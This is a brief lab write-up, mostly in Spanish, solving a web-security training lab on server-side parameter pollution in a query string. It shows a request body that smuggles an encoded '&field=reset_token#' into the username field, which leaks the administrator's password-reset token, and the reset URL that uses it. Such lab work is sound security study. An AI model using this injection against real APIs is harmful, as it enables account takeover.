01 Lab: Exploiting server-side parameter pollution in a query string

Objetivo

To solve the lab, log in as the administrator and delete carlos.

Solución

La respuesta Field not specified indica que hay campos que no se han llenado. Es decir con el %23 o con el # se ha forzado un error típico de apis

csrf=ieYJUI1Y4oYGwE0D8Ht5bpZAfUEZJ68E&username=administrator%26field=sdada%23

el %26 es url ecoded de &
el %23 es url ecoded de #

csrf=ieYJUI1Y4oYGwE0D8Ht5bpZAfUEZJ68E&username=administrator%26field=reset_token%23

{"type":"reset_token","result":"ojj4fu8g9bjvu3itnvwj6sudt21e3a47"}

/forgot-password?reset_token=ojj4fu8g9bjvu3itnvwj6sudt21e3a47

Previous29 API Testing

Last updated 11 months ago